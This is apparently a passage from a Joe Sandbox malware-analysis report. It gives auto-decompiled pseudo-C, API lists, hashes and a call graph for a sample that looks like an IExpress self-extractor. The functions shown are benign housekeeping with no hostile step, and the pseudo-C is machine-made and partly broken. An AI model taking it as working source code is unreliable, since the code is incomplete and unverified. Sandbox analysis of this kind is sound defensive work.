                                                                                                                                                                                                      						_t11 =  *0xe91e0; // 0x2d77c60
                                                                                                                                                                                                      						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                      						 *0xe91e0 = _t34;
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t25 =  *0xe8584; // 0x0
                                                                                                                                                                                                      					E000E44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                      					LocalFree(_t34);
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t26 =  *0xe8584; // 0x0
                                                                                                                                                                                                      				E000E44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}















                                                                                                                                                                                                      0x000e47e8
                                                                                                                                                                                                      0x000e47f0
                                                                                                                                                                                                      0x000e47f4
                                                                                                                                                                                                      0x000e480f
                                                                                                                                                                                                      0x000e4811
                                                                                                                                                                                                      0x000e4814
                                                                                                                                                                                                      0x000e4814
                                                                                                                                                                                                      0x000e4816
                                                                                                                                                                                                      0x000e4817
                                                                                                                                                                                                      0x000e4829
                                                                                                                                                                                                      0x000e482b
                                                                                                                                                                                                      0x000e482f
                                                                                                                                                                                                      0x000e484f
                                                                                                                                                                                                      0x000e4852
                                                                                                                                                                                                      0x000e4855
                                                                                                                                                                                                      0x000e4855
                                                                                                                                                                                                      0x000e4857
                                                                                                                                                                                                      0x000e4858
                                                                                                                                                                                                      0x000e4860
                                                                                                                                                                                                      0x000e4865
                                                                                                                                                                                                      0x000e486a
                                                                                                                                                                                                      0x000e486f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4876
                                                                                                                                                                                                      0x000e4831
                                                                                                                                                                                                      0x000e4841
                                                                                                                                                                                                      0x000e4847
                                                                                                                                                                                                      0x000e480b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e480b
                                                                                                                                                                                                      0x000e47f6
                                                                                                                                                                                                      0x000e4806
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,000E4E6F), ref: 000E47EA
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 000E4823
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 000E4847
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 000E4851
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                      • API String ID: 359063898-183442868
                                                                                                                                                                                                      • Opcode ID: 6b7ccadc434f02a26d2ff31d3892c7c5ad214a2880eaca3e3d945b61df2191cd
                                                                                                                                                                                                      • Instruction ID: e0993e2b4f9fea4b7dd782d30212eb6309aa6ad954762d3305fc481e3640b7d4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b7ccadc434f02a26d2ff31d3892c7c5ad214a2880eaca3e3d945b61df2191cd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C91136B57006C16FE7288F259C58FBA3B9AEBC5700F048459E982BB341CE399C068720
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                      			E000E6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                      				struct HRSRC__* _t6;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				struct HINSTANCE__* _t23;
                                                                                                                                                                                                      				int _t24;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t23 =  *0xe9a3c; // 0xe0000
                                                                                                                                                                                                      				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                      					L6:
                                                                                                                                                                                                      					E000E44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					_t24 = _a16;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_a12 != 0) {
                                                                                                                                                                                                      							_push(_a12);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                      						FreeResource(_t21);
                                                                                                                                                                                                      						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t24;
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      0x000e651f
                                                                                                                                                                                                      0x000e652a
                                                                                                                                                                                                      0x000e6534
                                                                                                                                                                                                      0x000e656b
                                                                                                                                                                                                      0x000e6577
                                                                                                                                                                                                      0x000e657c
                                                                                                                                                                                                      0x000e6536
                                                                                                                                                                                                      0x000e653e
                                                                                                                                                                                                      0x000e6542
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6544
                                                                                                                                                                                                      0x000e6547
                                                                                                                                                                                                      0x000e654c
                                                                                                                                                                                                      0x000e6549
                                                                                                                                                                                                      0x000e6549
                                                                                                                                                                                                      0x000e6549
                                                                                                                                                                                                      0x000e655e
                                                                                                                                                                                                      0x000e6560
                                                                                                                                                                                                      0x000e6569
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6569
                                                                                                                                                                                                      0x000e6542
                                                                                                                                                                                                      0x000e6587

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindResourceA.KERNEL32(000E0000,000007D6,00000005), ref: 000E652A
                                                                                                                                                                                                      • LoadResource.KERNEL32(000E0000,00000000,?,?,000E2EE8,00000000,000E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 000E6538
                                                                                                                                                                                                      • DialogBoxIndirectParamA.USER32(000E0000,00000000,00000547,000E19E0,00000000), ref: 000E6557
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,000E2EE8,00000000,000E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 000E6560
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1214682469-0
                                                                                                                                                                                                      • Opcode ID: f38376d1e7660cee9e1a8eb6c7bbc796d9d63be2f119ee65ae2d81e559ec293c
                                                                                                                                                                                                      • Instruction ID: 956fe8465cd6d57888c428207691170c35b461469c2d09d9e7c7f55b34a0c9ee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f38376d1e7660cee9e1a8eb6c7bbc796d9d63be2f119ee65ae2d81e559ec293c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1012B73300585BFDB205F5AAC48DBB76ACEB997A1F010125FE11B7150D776DD1086B1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E3680(void* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				struct tagMSG _v36;
                                                                                                                                                                                                      				int _t8;
                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v8 = __ecx;
                                                                                                                                                                                                      				_t16 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                      					if(_t8 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							if(_v36.message != 0x12) {
                                                                                                                                                                                                      								DispatchMessageA( &_v36);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t16 = 1;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                      						} while (_t8 != 0);
                                                                                                                                                                                                      						if(_t16 == 0) {
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					break;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t8;
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      0x000e368c
                                                                                                                                                                                                      0x000e368f
                                                                                                                                                                                                      0x000e3691
                                                                                                                                                                                                      0x000e369f
                                                                                                                                                                                                      0x000e36a7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e36ba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e36bc
                                                                                                                                                                                                      0x000e36bc
                                                                                                                                                                                                      0x000e36c0
                                                                                                                                                                                                      0x000e36cb
                                                                                                                                                                                                      0x000e36c2
                                                                                                                                                                                                      0x000e36c4
                                                                                                                                                                                                      0x000e36c4
                                                                                                                                                                                                      0x000e36da
                                                                                                                                                                                                      0x000e36e0
                                                                                                                                                                                                      0x000e36e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e36e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e36ba
                                                                                                                                                                                                      0x000e36ed

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 000E369F
                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000E36B2
                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 000E36CB
                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000E36DA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2776232527-0
                                                                                                                                                                                                      • Opcode ID: fe4caffa511867f7d60e24b62cf8a182a6a8154a29b5d5d4a64698980f5def55
                                                                                                                                                                                                      • Instruction ID: 339daf4c64505870c785528815b031292ff1bdd7b3833ab7a787ab36be55c125
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe4caffa511867f7d60e24b62cf8a182a6a8154a29b5d5d4a64698980f5def55
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3018476A002947FDB304AA75C4CEEBBFBCEBCAF10F004159B905F7180D5659640C660
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                                                                                      			E000E65E8(char* __ecx) {
                                                                                                                                                                                                      				char _t3;
                                                                                                                                                                                                      				char _t10;
                                                                                                                                                                                                      				char* _t12;
                                                                                                                                                                                                      				char* _t14;
                                                                                                                                                                                                      				char* _t15;
                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t12 = __ecx;
                                                                                                                                                                                                      				_t15 = __ecx;
                                                                                                                                                                                                      				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                      				_t10 = 0;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t3 =  *_t12;
                                                                                                                                                                                                      					_t12 =  &(_t12[1]);
                                                                                                                                                                                                      				} while (_t3 != 0);
                                                                                                                                                                                                      				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                      					if(_t16 <= _t15) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if( *_t16 == 0x5c) {
                                                                                                                                                                                                      						L7:
                                                                                                                                                                                                      						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                      							_t16 = CharNextA(_t16);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *_t16 = _t10;
                                                                                                                                                                                                      						_t10 = 1;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(_t16);
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					return _t10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *_t16 == 0x5c) {
                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      0x000e65e8
                                                                                                                                                                                                      0x000e65ed
                                                                                                                                                                                                      0x000e65ef
                                                                                                                                                                                                      0x000e65f2
                                                                                                                                                                                                      0x000e65f4
                                                                                                                                                                                                      0x000e65f4
                                                                                                                                                                                                      0x000e65f6
                                                                                                                                                                                                      0x000e65f7
                                                                                                                                                                                                      0x000e6608
                                                                                                                                                                                                      0x000e6611
                                                                                                                                                                                                      0x000e6618
                                                                                                                                                                                                      0x000e661c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e660e
                                                                                                                                                                                                      0x000e6623
                                                                                                                                                                                                      0x000e6625
                                                                                                                                                                                                      0x000e663b
                                                                                                                                                                                                      0x000e663b
                                                                                                                                                                                                      0x000e663d
                                                                                                                                                                                                      0x000e6641
                                                                                                                                                                                                      0x000e6610
                                                                                                                                                                                                      0x000e6610
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6610
                                                                                                                                                                                                      0x000e6644
                                                                                                                                                                                                      0x000e6647
                                                                                                                                                                                                      0x000e6647
                                                                                                                                                                                                      0x000e6621
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,000E2B33), ref: 000E6602
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 000E6612
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 000E6629
                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 000E6635
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Prev$Next
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3260447230-0
                                                                                                                                                                                                      • Opcode ID: 1a455d652a5ad36e4ebad611e173031636dd354b34287b67c19a03b4eefac794
                                                                                                                                                                                                      • Instruction ID: 5a755f099a5a671e0b5654145f5537371440f2047ca56dde0a629dc3041c1a7c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a455d652a5ad36e4ebad611e173031636dd354b34287b67c19a03b4eefac794
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88F07D321000C06EE7320B2A6CC88BBBFDCCFAB394B1901AFE891B2000D61B0C028661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E69B0() {
                                                                                                                                                                                                      				intOrPtr* _t4;
                                                                                                                                                                                                      				intOrPtr* _t5;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                                                                      				intOrPtr _t12;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				 *0xe81f8 = E000E6C70();
                                                                                                                                                                                                      				__set_app_type(E000E6FBE(2));
                                                                                                                                                                                                      				 *0xe88a4 =  *0xe88a4 | 0xffffffff;
                                                                                                                                                                                                      				 *0xe88a8 =  *0xe88a8 | 0xffffffff;
                                                                                                                                                                                                      				_t4 = __p__fmode();
                                                                                                                                                                                                      				_t11 =  *0xe8528; // 0x0
                                                                                                                                                                                                      				 *_t4 = _t11;
                                                                                                                                                                                                      				_t5 = __p__commode();
                                                                                                                                                                                                      				_t12 =  *0xe851c; // 0x0
                                                                                                                                                                                                      				 *_t5 = _t12;
                                                                                                                                                                                                      				_t6 = E000E7000();
                                                                                                                                                                                                      				if( *0xe8000 == 0) {
                                                                                                                                                                                                      					__setusermatherr(E000E7000);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E000E71EF(_t6);
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x000e69b7
                                                                                                                                                                                                      0x000e69c2
                                                                                                                                                                                                      0x000e69c8
                                                                                                                                                                                                      0x000e69cf
                                                                                                                                                                                                      0x000e69d8
                                                                                                                                                                                                      0x000e69de
                                                                                                                                                                                                      0x000e69e4
                                                                                                                                                                                                      0x000e69e6
                                                                                                                                                                                                      0x000e69ec
                                                                                                                                                                                                      0x000e69f2
                                                                                                                                                                                                      0x000e69f4
                                                                                                                                                                                                      0x000e6a00
                                                                                                                                                                                                      0x000e6a07
                                                                                                                                                                                                      0x000e6a0d
                                                                                                                                                                                                      0x000e6a0e
                                                                                                                                                                                                      0x000e6a15

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 000E6FC5
                                                                                                                                                                                                      • __set_app_type.MSVCRT ref: 000E69C2
                                                                                                                                                                                                      • __p__fmode.MSVCRT ref: 000E69D8
                                                                                                                                                                                                      • __p__commode.MSVCRT ref: 000E69E6
                                                                                                                                                                                                      • __setusermatherr.MSVCRT ref: 000E6A07
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1632413811-0
                                                                                                                                                                                                      • Opcode ID: 511489954baff41ebe002faef63f5065096f978479c8f7c7810aed2055e6a257
                                                                                                                                                                                                      • Instruction ID: c6db3857f666ce3c6bdb80116f86d17acd2676051fab9e45cd2136b7686506e9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 511489954baff41ebe002faef63f5065096f978479c8f7c7810aed2055e6a257
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEF0FE706083C1CFE7586B35FE8A6043B61FB09B21B104659E569BE2F1CF3E95408F11
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                                                                      • Disassembly available
                                                                                                                                                                                                      callgraph 0 Function_00A61EA7 103 Function_00A6256D 0->103 1 Function_00A66FA5 113 Function_00A6724D 1->113 2 Function_00A63BA2 16 Function_00A644B9 2->16 18 Function_00A66285 2->18 23 Function_00A61781 2->23 24 Function_00A6468F 2->24 28 Function_00A66495 2->28 38 Function_00A66CE0 2->38 45 Function_00A63FEF 2->45 49 Function_00A61AE8 2->49 74 Function_00A6202A 2->74 97 Function_00A62267 2->97 3 Function_00A672A2 4 Function_00A618A3 4->38 44 Function_00A617EE 4->44 5 Function_00A655A0 5->16 5->18 5->23 5->24 25 Function_00A6658A 5->25 5->38 77 Function_00A62630 5->77 88 Function_00A66517 5->88 96 Function_00A65467 5->96 110 Function_00A6597D 5->110 117 Function_00A66952 5->117 6 Function_00A64CA0 7 Function_00A653A1 22 Function_00A61680 7->22 7->25 7->38 92 Function_00A6171E 7->92 8 Function_00A66FA1 9 Function_00A666AE 10 Function_00A62AAC 10->22 10->38 51 Function_00A665E8 10->51 65 Function_00A617C8 10->65 11 Function_00A62CAA 11->4 11->16 11->24 30 Function_00A62390 11->30 32 Function_00A65C9E 11->32 11->38 43 Function_00A636EE 11->43 11->88 12 Function_00A652B6 12->23 12->30 12->38 42 Function_00A61FE1 12->42 12->51 13 Function_00A616B3 13->23 14 Function_00A669B0 15 Function_00A66FBE 14->15 46 Function_00A671EF 14->46 84 Function_00A67000 14->84 108 Function_00A66C70 14->108 115 Function_00A66F54 15->115 16->22 16->38 66 Function_00A667C9 16->66 16->92 93 Function_00A6681F 16->93 17 Function_00A61A84 109 Function_00A6667F 17->109 19 Function_00A66380 20 Function_00A63680 21 Function_00A64980 21->16 111 Function_00A6487A 21->111 22->23 25->13 26 Function_00A6268B 26->16 26->38 26->92 27 Function_00A62A89 28->23 28->25 28->38 29 Function_00A66793 30->13 30->22 30->25 30->30 30->38 31 Function_00A61F90 31->0 31->16 31->38 32->16 32->22 32->25 37 Function_00A631E0 32->37 32->38 64 Function_00A666C8 32->64 75 Function_00A66E2A 32->75 87 Function_00A65C17 32->87 32->109 33 Function_00A66298 33->38 33->92 34 Function_00A64E99 34->22 35 Function_00A651E5 35->16 35->18 35->24 36 Function_00A64FE0 36->16 36->24 56 Function_00A64EFD 36->56 52 Function_00A66CF0 38->52 39 Function_00A624E0 39->25 39->38 40 Function_00A619E0 40->38 69 Function_00A643D0 40->69 41 Function_00A647E0 41->16 41->22 43->16 43->27 43->38 50 Function_00A628E8 43->50 43->66 43->93 44->38 45->16 45->18 45->38 95 Function_00A6411B 45->95 47 Function_00A66BEF 48 Function_00A670EB 49->10 49->13 49->16 49->17 49->22 49->23 49->25 49->38 49->64 49->92 50->27 106 Function_00A62773 50->106 53 Function_00A634F0 53->16 53->20 53->69 54 Function_00A66EF0 55 Function_00A670FE 56->21 56->38 99 Function_00A64B60 56->99 57 Function_00A62BFB 57->11 57->12 57->31 94 Function_00A62F1D 57->94 58 Function_00A666F9 59 Function_00A64CC0 60 Function_00A64BC0 61 Function_00A630C0 62 Function_00A663C0 62->23 62->25 62->38 63 Function_00A658C8 63->16 63->18 63->22 63->25 114 Function_00A66648 64->114 66->29 67 Function_00A64AD0 67->20 68 Function_00A64CD0 68->21 68->34 68->38 68->41 76 Function_00A64C37 68->76 80 Function_00A64702 68->80 68->99 104 Function_00A6476D 68->104 69->38 70 Function_00A63B26 70->33 70->36 70->88 71 Function_00A64224 71->16 71->22 72 Function_00A67120 73 Function_00A66A20 74->16 74->25 74->38 74->92 75->52 77->16 77->38 78 Function_00A63A3F 78->16 78->18 78->24 78->88 79 Function_00A66C3F 80->13 80->22 81 Function_00A66C03 81->113 82 Function_00A63100 82->69 83 Function_00A64200 85 Function_00A6490C 86 Function_00A67208 88->16 89 Function_00A67010 90 Function_00A63210 90->16 90->25 90->63 90->69 90->71 90->110 91 Function_00A6621E 91->16 91->18 91->38 91->110 93->38 93->58 94->2 94->5 94->16 94->18 94->25 94->35 94->38 94->70 94->78 94->91 98 Function_00A65164 94->98 94->103 105 Function_00A64169 94->105 95->0 96->7 96->18 96->22 96->23 96->25 96->38 96->63 96->110 97->25 97->38 97->92 98->16 98->24 98->33 100 Function_00A66A60 100->57 100->79 100->86 101 Function_00A67060 100->101 100->113 116 Function_00A67155 100->116 101->72 101->89 102 Function_00A66760 103->39 104->9 104->88 105->16 105->24 106->22 106->23 106->25 106->38 107 Function_00A67270 109->114 110->16 110->18 110->26 110->38 111->85 112 Function_00A66F40 115->86 115->113 118 Function_00A64A50 119 Function_00A63450 119->69

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
